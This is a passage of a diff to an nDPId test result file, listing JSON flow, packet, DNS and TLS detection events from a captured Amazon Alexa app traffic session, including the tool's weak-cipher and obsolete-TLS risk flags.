-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1490976164994,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976164994,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmBAAEARM1WsECrYrBAqAfpJADUAKhd4KNkBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 
00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1490976165058,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976165058,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl5+FAAEARpaysECoBrBAq2AA1+kkAUQAZKNmBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAsACwhwaXRhbmd1acASwC4AAQABAAAABgAENF7ohg=="} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
